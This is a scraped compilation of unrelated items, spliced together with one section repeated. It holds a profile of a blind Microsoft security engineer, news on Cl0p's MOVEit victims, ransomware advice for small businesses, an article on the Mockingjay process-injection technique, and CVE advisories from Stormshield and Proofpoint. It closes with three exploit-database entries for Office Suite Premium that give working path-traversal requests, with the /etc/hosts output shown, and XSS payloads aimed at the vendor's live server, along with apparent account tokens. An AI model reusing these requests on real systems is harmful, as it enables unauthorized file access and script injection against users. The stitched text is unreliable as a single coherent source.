Facts about Aditi Shah:
Tools she uses: Aditi’s main tool is JAWS, a screen reader from Freedom Scientific, which she touts as the best in the market. This tool has made her digital life more manageable, enabling her to perform almost any task independently.
Aditi also uses Seeing AI, a Microsoft app that she uses for important life tasks, like reading her mail, providing descriptions of different products, identifying colors for her outfits, and more.

**Facts about Aditi Shah:**

**Tools she uses:** Aditi’s main tool is JAWS, a screen reader from Freedom Scientific, which she touts as the best in the market. This tool has made her digital life more manageable, enabling her to perform almost any task independently.

Aditi also uses Seeing AI, a Microsoft app that she uses for important life tasks, like reading her mail, providing descriptions of different products, identifying colors for her outfits, and more.

**Where you’ll find her on a Saturday night:** Aditi loves audio card and board games, like poker and Texas Hold ‘Em (which she rarely loses). On Saturday night, you’ll find her playing games with her friends virtually.

**Literary aficionado:** Aditi reads at least one book every week. From murder mysteries and sci-fi sagas to enlightening self-help and spiritual books, she embraces a wide array of genres.

**Role models:** From tech titans to personal mentors, Aditi draws inspiration from a diverse group of individuals: Satya Nadella’s bold approach to cultivating culture at Microsoft, which includes helping people growth together, Elon Musk’s controversial but thought-provoking first principles, and the influential mentor at Microsoft, Abhilasha, who taught her to lead without authority and inspire greatness in those around her.

**Music** Aditi loves jamming to Bollywood music, particularly tracks by Arijit, and occasionally indulges in a bit of Taylor Swift. Her playlists are always full of surprises!

**What’s next?** Aditi wants to keep scaling beyond what she thinks she can and cannot do. She wants to embark on more outdoor activities and travel more independently in the near future.

> “Check your unconscious bias about people with disabilities. Look at people’s abilities instead of focusing on their disabilities.”

Aditi Shah has reshaped the conventional narrative of what it means to be a cybersecurity leader. From steering machine learning automations to pioneering work in AI for cybersecurity, she has left an indelible mark on the industry in just a few years into her career. Beyond her technical prowess, she’s also a fervent advocate for inclusivity and accessibility, driving key initiatives within Microsoft and the tech industry.  Her journey, underpinned by her resilience and determination, is not just a personal triumph, but an inspiration for countless others in the field.

Hailing from Mumbai, India, Aditi was a nerdy kid who always dreamed of pursuing her passion for computers to become a software engineer. Then, at 11, Aditi’s life slowly started to change, when she started tripping over objects and required larger text. Although Aditi’s parents thought she was perhaps a bit absent-minded, a visit to the ophthalmologist led Aditi to life-changing news: she had Retinitis Pigmentosa and would slowly lose her vision. At the age of 15, Aditi lost her sight completely. With no blind role models to guide her, Aditi forged her own path.

An affliction that could’ve derailed her dreams only served to strengthen them, paving the way for a journey she’d never envisaged before, one she would embark upon with unwavering resolve and courage. Aditi’s mother recorded her textbooks onto audio cassettes, enabling her to continue her education despite diminishing sight. Fueled by perseverance and an unwavering will, Aditi’s drive to succeed led to her being one of the top 3 students in the city of Mumbai. After high school, she pursued a bachelor’s and master’s degree in I.T. at the University of Mumbai, becoming the first blind student to study STEM at the University.

Being a trailblazer had its challenges. There were no other blind students in STEM that Aditi could share experiences with and no accessible study materials. Aditi only had access to very rudimentary screen reader technology. Nevertheless, Aditi addressed these challenges head-on, learning the invaluable lessons of persistence no matter the odds, which would continue to serve her well throughout her career.

Despite graduating at the top of her class, the “real world” slammed its doors in Aditi’s face. Companies refused to interview her due to her blindness, assuming that she wouldn’t be able to work as a software engineer. Aditi pivoted and carved out a successful career as a freelancer, which eventually led to a full-time role at an enterprise security solutions company, where she had the opportunity to eventually lead all of product development.

Aditi wanted to go deeper into security, which led to her making a big move to study cybersecurity at Georgia Tech, marking her first experience living alone. She ran into a new set of challenges, such as learning to walk with a white cane, cooking, furnishing her apartment, and more. Despite these challenges, Aditi once again persevered and graduated with a 4.0, and landed a summer internship with Microsoft, which led to a full-time offer in Redmond, Washington.

What sparked Aditi’s fascination for cybersecurity was the need to be a polymath, to know everything. She reveled in the fact that proficiency in cybersecurity demanded a wide range of skills – everything from computer science to operating systems, networks, and databases. She felt a magnetic pull to the field since every creation needs to be secure and the prospect of an ever-evolving landscape of learning and application invigorated her. Schooling taught her the basics, but her thirst for knowledge led her to delve deeper into the hacking world and adopt the security mindset. This fresh perspective made her look at everything through a different lens, always probing, “How can this be broken?”

The current state of security can be overwhelming, yet Aditi saw it as a call to action. The digital transformation, especially accelerated by the Covid-19 pandemic massively increased the attack surface, outstripping the human capacity for response. This stark reality spurred Aditi towards AI as a solution. She saw the need of AI-centric defense, understanding both sides of the coin–thinking as a defender to secure systems, and from the offensive security side to anticipate breaches. As a researcher, she pondered how AI solutions could be harnessed to thwart bad actors and amplify the good ones.

Aditi’s work on machine learning over three years made her realize its potential to think in thousands of dimensions, something humans are incapable of. The ability to use AI to sift through vast amounts of data, cut through the noise, and zero in on key signals is game-changing. Aditi recently worked on the Microsoft Security Copilot, using GPT to empower incident responders to protect customers.

The future of AI, Aditi believes, is akin to electricity—it will power everything. It’s imperative that AI is safe, secure, and fair for all. This challenge is likely to be Aditi’s next adventure, a quest to safeguard the world’s AI systems.

In addition to her regular job responsibilities at Microsoft, Aditi is also deeply committed to making a difference in her community. Within Microsoft, she co-chairs the disability Employee Resource Group for Microsoft Security and is also part of the Microsoft Security Diversity & Inclusion Council, tirelessly working to create an inclusive environment for all types of disabilities.

Recognizing the lack of representation in tech and cybersecurity, Aditi took it upon herself to address the issue from its roots. She collaborates with nonprofits like Our Space, Our Place and Vision-Aid, which focus on underprivileged children and those with disabilities, especially in remote parts of India. Through these endeavors, Aditi helps these children get the support and motivation they need to develop their skills and increase their employability.

Aditi’s story is a powerful testament to her never-ceasing hunger for knowledge and her unwavering dedication to breaking barriers. Today, she is not only a cybersecurity and AI expert, but an inspiring role model for countless others with disabilities navigating their own paths. She also has an important message for allies in the tech industry: “check your unconscious bias about people with disabilities. Look at people’s abilities instead of focusing on their disabilities.” Aditi’s message to people who are blind or visually impaired is simple yet powerful: “Don’t let anything limit your potential.”

Aditi would love to hear from anyone who could benefit from discussion with her, which would include individuals with disabilities or someone who wants a career in AI and security. You can reach out to Aditi via her LinkedIn profile: Aditi Shah | LinkedIn

Breaking Barriers: Aditi’s Journey Through Sight Loss to Microsoft AI Innovator

Cl0p ransomware group uses its Dark Web leak site to identify five new victims of MOVEit cyberattacks.

Schneider Electric; Siemens Energy; the University of California at Los Angeles (UCLA); Werum, a pharmaceutical technology provider; and AbbVie, a biopharmaceutical company, are the five latest organizations identified on the Cl0p ransomware group's Dark Web data leak site as victims of MOVEit cyberattacks.

Threat actor directory organization Falcon Feeds monitors the Cl0p ransomware leak site and released the latest list to Twitter today.

For its part, UCLA uses MOVEit Transfer to transfer files across the campus and to other entities. In a statement to Dark Reading, the university noted that it discovered the attack on May 28, after which it "immediately activated its incident response procedures, fixed the vulnerability using the security patch issued by Progress Software, and enhanced monitoring of the system."

The statement continues, "the university notified the FBI and worked with external cybersecurity experts to investigate the matter and determine what happened, what data was impacted and to whom the data belongs. Those who have been impacted have been notified. This is not a ransomware incident. There is no evidence of any impact to any other campus systems."

Last Saturday, the New York City Department of Education (DoE) revealed it was also the victim of a MOVEit cyberattack, resulting the in unauthorized access of around 19,000 documents affecting 45,000 students.

"The FBI is investigating the broader breach that has impacted hundreds of entities; we are currently cooperating with both the NYPD and FBI as they investigate," the DoE announcement of the breach said. "Given that review and investigation are ongoing, we are limited in terms of additional details at this point."  

**MOVEit File Flaw**

Progress Software's MOVEit file transfer software zero-day vulnerability was discovered May 31 and traced back to the Russian ransomware group Cl0p. But before the zero-day bug could be patched, Cl0p already had its foothold in target systems.

The ransomware group reportedly sat on the MOVEit file transfer vulnerability for two years before it started to actively target victims including the BBC, British Airways, and the government of Nova Scotia.

Subsequent MOVEit victims emerged later, including Gen Digital, parent company of Avast and Norton.

UCLA, Siemens Among Latest Victims of Relentless MOVEit Attacks

One ransomware attack can be devastating for a small or midsize business. Here are four solid survival tips to ensure it doesn't turn into a disaster.

If your organization is hit with a ransomware attack, it's going to cost you. According to Verizon's "2023 Data Breach Investigations Report"(DBIR), released earlier this month, the median loss to a ransomware attack has risen to $26,000 and can go as high as $2.25 million.

"\[T\]he overall costs of recovering from a ransomware incident are increasing, even as the ransom amounts are lower. This fact could be suggesting that the overall company size of ransomware victims is trending down," the DBIR team wrote.

Much of the expense comes from the loss of business and recovery time. The average ransomware attack has a life cycle of more than 300 days. That's nearly a full year in which the organization is tied up with discovery and remediation — and almost two months longer than other types of cyber incidents. And then there are other costs to factor, such as long-term damage to the corporate brand and reputation, as well as loss of institutional knowledge when the employees who are held responsible for the attack are let go.

The costs surrounding a ransomware attack could cripple small and midsize businesses (SMBs) and even cause one to shut down. But it doesn’t have to be that way. Even for SMBs with tight IT/security budgets and limited security expertise, ransomware protection and recovery boils down to planning ahead.

The best way to avoid the high costs of a ransomware attack is to avoid being a victim, but protection and detection tools also come with hefty price tags. How much a company will need to pay depends on the number of employees and devices it needs to protect, but even a company with as few as 50 people can spend five figures on ransomware protection. Cyber insurance to protect the business in case of an attack could add at least $1,500 per $1 million in coverage, depending on the deductible.

Note that getting cyber insurance for ransomware is not easy; many insurance agencies are limiting coverage because of the high payout costs.

Organizations also need to think about the cybersecurity approach they want to take. How cybersecurity teams approach ransomware defense has changed over the years, says PJ Kirner, CTO and co-founder of Illumio. Cybersecurity has shifted from perimeter defense (setting up a secure perimeter to keep the bad guys out), to rapid detection (detecting and stopping as quickly as possible), to containment (limiting the amount of damage the attackers can cause once they break in).

Which approach an SMB decides to take determines the type of tools and protective actions it will need. A company deciding to contain malware would make investments to beef up authentication and privilege management in order to validate all users and devices before granting access to any transaction. A company focused on perimeter defense would have very different investments, requiring firewalls and other methods to keep attackers out of the network.

While an organization can adopt any number of security systems and tools, SMBs should consider the following actions, regardless of their overall security approach.

**1\. Decrease the Attack Surface**

Applying the concept of least-privilege access can close the door against ransomware attacks. The fewer people with access to applications and databases, the lower the chances for cybercriminals to also gain access and get in. Audit your users' roles to make sure they have access only to the software and services they need, especially if the software processes sensitive data.

For example, explains Kirner, Remote Desktop Protocol (RDP) is a popular access point for threat actors to get into a Windows system and launch ransomware. But RDP is most often used for IT help desks and troubleshooting. Most employees across the business have no need to have RDP accounts, yet they might have RDP enabled on their machines. Kirner advises revoking access if employees have no reason to have those accounts.

"Remove all that attack surface from your environment," Kirner says. "This is something you can do proactively and reduce the impact of ransomware."

Also worth disabling — especially in a Windows environment — is PowerShell. Attackers are increasingly using PowerShell in malware-less attacks. The average user is never going to use it, so it's better to disable it when setting up the user machine. Similarly, keep track of what accounts have been created on the network or for cloud applications and services. If the employee no longer needs it or has left the company, remove that account entirely. Cloud access security broker software can help manage and monitor employees’ cloud activity and enforce security policies.

**2\. Shift the Costs to the Attackers**

Another way to make your organization less attractive to bad actors is to make launching an attack more costly for the cybercriminal. Something as simple as restricting access to unnecessary applications shifts the burden to the attacker. If the attacker can’t do much with the application despite having user credentials — maybe they can only view reports but can’t extract data — the attacker has a choice of moving on to easier victims or working harder. Similarly, requiring multifactor authentication adds another roadblock for threat actors because just stealing credentials is no longer enough. Many types of MFA can fit an SMB's budget and security expertise, including biometrics, hardware tokens, and even the employee’s phone.

Attackers are economic actors, just like any other business, Kirner points out. "When they run out of time, they'll go to an environment with less security controls," he says.

**3\. Improve Your Security Hygiene**

Good security hygiene is important, regardless of company size.

The first step is to build an internal security culture around cybersecurity awareness and guidance, explains Dave Gerry, CEO at Bugcrowd. That doesn’t just mean watching security videos and calling it a day. Encourage open communications and give employees the confidence to report anything that seems suspicious.

Explain which external services and resources are allowed and why there are restrictions. Make it easy for employees to go through an approval process for getting access to tools so that they aren’t just going off and creating their own accounts.

Use modern training materials. Security companies are now producing training videos that are episodic, like sitcoms, or use techniques from reality shows that entertain as well as educate.

Gamification, such as setting up contests or offering rewards when designated milestones are met, also creates an environment where employees want to improve their security practices. Human error is a top cause of cyberattacks. When employees are encouraged to take an active role in cybersecurity and understand the consequences when they don't, you add another cybersecurity tool at little cost.

**4\. Don't Fail to Plan**

Prevention is important, but every organization should have a plan in place to mitigate an attack when it happens. The company should know who will be involved in mitigation and recovery, as well as how to handle the negotiations.

For example, because of the possibility that a ransomware attack can lead to permanently shutting down an SMB, many plan to pay the ransom. That requires setting a budget on how much to pay. If the organization does not already have a cryptocurrency wallet or access to cryptocurrency, that will make payment a bit difficult. SMBs are already working with managed service providers, consultants, and contractors. It may be worth lining up a ransomware negotiator ahead of time, who can spring into action when needed. The same goes for a computer forensics team to help figure out what is happening on the network and how to remove the ransomware.

Priority No. 1 has to be a strategy, says Joseph Carson, chief security scientist at Delinea. A ransomware attack isn't a typical incident, he points out. It will make you unavailable to your customers and, in worst-case scenarios, put lives at risk. No matter how small your budget, it is essential to think about what ransomware defense should look like but to also plan out what is needed for a successful recovery.

Protecting Small Businesses From Ransomware on a Budget

By leveraging misconfigured DLLs instead of EDR-monitored APIs, this new technique injects malicious code into running processes, completely evading endpoint security.

Endpoint detection and response (EDR) systems have become increasingly efficient at detecting typical process injection attempts that invoke a combination of application programming interfaces to insert code into the memory space of a running process.

So researchers at Israeli-based Security Joes set out to find another way to due process injection without relying on EDR-monitored APIs. The result is Mockingjay, a novel method for process injection that leverages dynamic link libraries (DLLs) with default read, write, and execute (RWX) permissions to push code into the address space of a running process.

**The Mockingjay Approach**

The approach reduces the likelihood of an endpoint security mechanism detecting a malicious process injection effort and requires a smaller number of steps to achieve, Security Joes said in a report this week. "Our research aimed to discover alternative methods to dynamically execute code within the memory space of Windows processes, without relying on the monitored Windows APIs," the security firm said.

"Our unique approach, which involves leveraging a vulnerable DLL and copying code to the appropriate section, allowed us to inject code without memory allocation, permission setting, or even starting a thread in the targeted process."

Process injection is a technique for manipulating the memory of a process to either add new functionality or modify its behavior. Attackers commonly use the method to hide malicious code and evade detection on compromised systems. Common process injection methods include self-injection where a process that receives the injected payload also executes it; DLL injection where a malicious DLL is loaded into the memory space of a process; and PE injection where a portable executable file is mapped into the memory of a running process.

"Each of these injection techniques requires a set of specific Windows APIs, which generate characteristic patterns that can be leveraged by defenders and security software for detection and mitigation purposes," Security Joes said in its report. For instance, the APIs required for self-injection are VirtualAlloc, LocalAlloc, GlobalAlloc, and Virtual Protect, the company said. Similarly, the APIs used in PE injection are VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread. Most EDR systems are tuned to monitor commonly used APIs in process injection attacks and can effectively identify malicious activity associated with their use.

**Abusing Vulnerable DLLs**

The strategy Security Joes used in developing Mockingjay was to systematically search for DLLs within the Windows OS that contained a default RWX section. Researchers at the company developed a tool that explored the entire Windows file system to identify DLLs that could serve as potential vehicles for code injection without triggering an EDR alert. The exploration resulted in Security Joes finding a DLL (msys-2.0.dll) with 16KB of RWX space in Visual Studio 2022 Community that they could use for injecting and executing their own code.

"After identifying the vulnerable DLL that contains a default Read-Write-Execute (RWX) section on disk, we conducted several tests to explore two different methods that could leverage this misconfiguration to execute code in memory," Security Joes said.

One method was to directly load the vulnerable DLL into the memory space of a custom application called nightmare.exe that Security Joes developed. Doing that allowed researchers to inject and execute their own shellcode into the memory space of the application without leveraging any Windows APIs. Among other things, the shellcode also removed all EDR hooks without triggering any alerts. "This complete removal of dependency on Windows APIs not only reduces the likelihood of detection but also enhances the effectiveness of the technique," the company said.

Security Joes' second tactic for abusing the RWX section in the DLL was to do process injection in a remote process. To achieve this, they first identified binaries that used mysys-2.0.dll for their operations. Many of these were associated with GNU utilities and other applications that require POSIX emulation. For the proof-of-concept, researchers chose the ssh.exe process in Visual Studio 2022 Community as the target for injecting their code. "It is important to note that in this injection method, there is no need to explicitly create a thread within the target process, as the process automatically executes the injected code," the company explained.

According to Security Joes, the DLL that its researchers used to developed Mockingjay is just one of potentially many others that can similarly be abused for code injection purposes. Addressing the threat requires endpoint security tools that don't just monitor specific APIs and DLLs but also use behavioral analysis and machine learning techniques to identify process injection.

Mockingjay Slips By EDR Tools With Process Injection Technique

Stormshield Endpoint Security Evolution 2.0.0 through 2.4.2 has Insecure Permissions. An ACL entry on the SES Evolution agent directory that contains the agent logs displayed in the GUI allows interactive users to read data, which could allow access to information reserved to administrators.

**SES Evolution superfluous agent directory ACL entry (CVE-2023-35800)**

Advisory ID

CVE Number

Date discovered

Severity

Advisory revision

STORM-2023-021

CVE-2023-35800

06/14/2023

low

v1

**Vulnerability details**

An ACL entry on an SES Evolution agent directory is too permissive.

**Impacted products**

Products

Severity

Detail

Stormshield Endpoint Security

low

SES is impacted

**Revisions**

Version

Date

Description

v1

Initial release

**Stormshield Endpoint Security**

**CVSS v3.1 Overall Score: 2.4      **

**Analysis**

**Impacted version**

An ACL entry on the SES Evolution agent directory that contains the agent logs displayed in the GUI allows interactive users to read data, which could allow access to information reserved to administrators, in case agent self-protection has been previously deactivated.

*   SES 2.0.0 to 2.4.2

**Workaround solution**

**Solution**

The vulnerability can be mitigated by disabling maintenance mode and challenges on SES Evolution agents, and preventing non-administrator users from booting in safe mode in the system configuration, so that the agent self-protection cannot be deactivated.

The 2.4.3 update fixes this vulnerability.

Attack Vector

Attack Complexity

Privileges Required

User Interaction

Scope

Confidentiality Impact

Integrity Impact

Availability impact

Local

Low

Low

None

Unchanged

Low

None

None

CVSS Base score: 3.3

CVSS Vector: (AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

Exploit Code Maturity

Remediation Level

Report Confidence

Proof of concept code

Official fix

Confirmed

CVSS Temporal score: 3

CVSS Vector: (AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C)

Confidentiality Requirement

Integrity Requirement

Availability Requirement

Low

Low

Low

CVSS Environmental score: 2.4

CVSS Vector: (AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C/CR:L/IR:L/AR:L/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X)

CVE-2023-35800: SES Evolution superfluous agent directory ACL entry (CVE-2023-35800)

Stormshield Endpoint Security Evolution 2.0.0 through 2.3.2 has Insecure Permissions. An interactive user can use the SES Evolution agent to create arbitrary files with local system privileges.

**SES Evolution agent arbitrary file creation (CVE-2023-35799)**

Advisory ID

CVE Number

Date discovered

Severity

Advisory revision

STORM-2023-022

CVE-2023-35799

06/14/2023

low

v1

**Vulnerability details**

An interactive user can use the SES Evolution agent to create an arbitrary file with local system privileges.

**Impacted products**

Products

Severity

Detail

Stormshield Endpoint Security

low

SES is impacted

**Revisions**

Version

Date

Description

v1

Initial release

**Stormshield Endpoint Security**

**CVSS v3.1 Overall Score: 3.4      **

**Analysis**

**Impacted version**

An interactive user can use the SES Evolution agent to create arbitrary files with local system privileges. This does not allow to replace existing files and does not allow to control the create file contents. This allows to cause denial of service for arbitrary components, including system processes and SES Evolution agent processes.

*   SES 2.0.0 to 2.3.2

**Workaround solution**

**Solution**

There is no workaround solution.

The 2.4.1 update fixes this vulnerability.

Attack Vector

Attack Complexity

Privileges Required

User Interaction

Scope

Confidentiality Impact

Integrity Impact

Availability impact

Local

Low

Low

None

Unchanged

None

None

High

CVSS Base score: 5.5

CVSS Vector: (AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

Exploit Code Maturity

Remediation Level

Report Confidence

Proof of concept code

Official fix

Confirmed

CVSS Temporal score: 5

CVSS Vector: (AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C)

Confidentiality Requirement

Integrity Requirement

Availability Requirement

Low

Low

Low

CVSS Environmental score: 3.4

CVSS Vector: (AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C/CR:L/IR:L/AR:L/MAV:X/MAC:X/MPR:X/MUI:X/MS:X/MC:X/MI:X/MA:X)

CVE-2023-35799: SES Evolution agent arbitrary file creation (CVE-2023-35799)

An insecure filesystem permission in the Insider Threat Management Agent for Windows enables local unprivileged users to disrupt agent monitoring. All versions prior to 7.14.3 are affected. Agents for MacOS and Linux and Cloud are unaffected.

**Security Advisory Text****ITM Windows Agent Insecure Filesystem Permissions, CVE-2023-2818**

Advisory ID: PFPT-SA-2023-0005

An insecure filesystem permission in the Insider Threat Management Agent for Windows enables local unprivileged users to disrupt event reporting. All versions prior to 7.14.3 are affected. Agents for MacOS and Linux and Cloud are unaffected.

**Vulnerability Information**

This vulnerability is identified by CVE-2023-2818.

This vulnerability has been assigned a CVSS score of 5.5 (Medium):

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

**Fixed Software**

Proofpoint has released fixed software version 7.14.3.

The fixed software version is now available through the customer support portal.

**URL**

https://www.proofpoint.com/us/security/security-advisories/pfpt-sa-2023-005

**Revision History**

Version

Description

Section

Date

1.0

Initial release

 

June 27, 2023

**Legal Disclaimer**

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. PROOFPOINT RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for authorized subscribers to Proofpoint products and services.

CVE-2023-2818: ITM Windows Agent Insecure Filesystem Permissions | Proofpoint US

Office Suite Premium version 10.9.1.42602 suffers from a local file inclusion vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Local File Inclusion

Office Suite Premium version 10.9.1.42602 suffers from a path traversal vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Path Traversal# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Path Traversal

Office Suite Premium version 10.9.1.42602 suffers from a cross site scripting vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Cross-Site Scripting (reflected)# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POC# Exploit Details : Following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.Request 1: GET /api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-code HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Url: https://connect.mobisystems.com/api?path=profile&lang=en_EN&application=wynq8%3cimg%20src%3da%20onerror%3dalert(1)%3egik2hgdc3o2&command=issue-xchange-codePayload: <img src=a onerror=alert(1)>Parameter : applicationRequest 2 : GET /api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527 HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&id=dfsse%3cimg%20src%3da%20onerror%3dalert(1)%3ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527Payload : <img src=a onerror=alert(1)>Parameter: idRequest 3 : GET /api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=search HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: en_EN,en;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Lang: en_ENGdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19URL : https://connect.mobisystems.com/api?path=files&filter=pt3gh%3cimg%20src%3da%20onerror%3dalert(1)%3ei22b7eyyoi2&options=%7B%22order%22%3Anull%2C%22size%22%3A100%2C%22cursor%22%3Anull%7D&root=%7B%22account%22%3A%22234c89ff-7e80-4b64-9d35-8653fe131795%22%2C%22key%22%3Anull%2C%22name%22%3Anull%2C%22parent%22%3Anull%7D&command=searchPayload :<img src=a onerror=alert(1)>Parameter: filter

Tag

#mac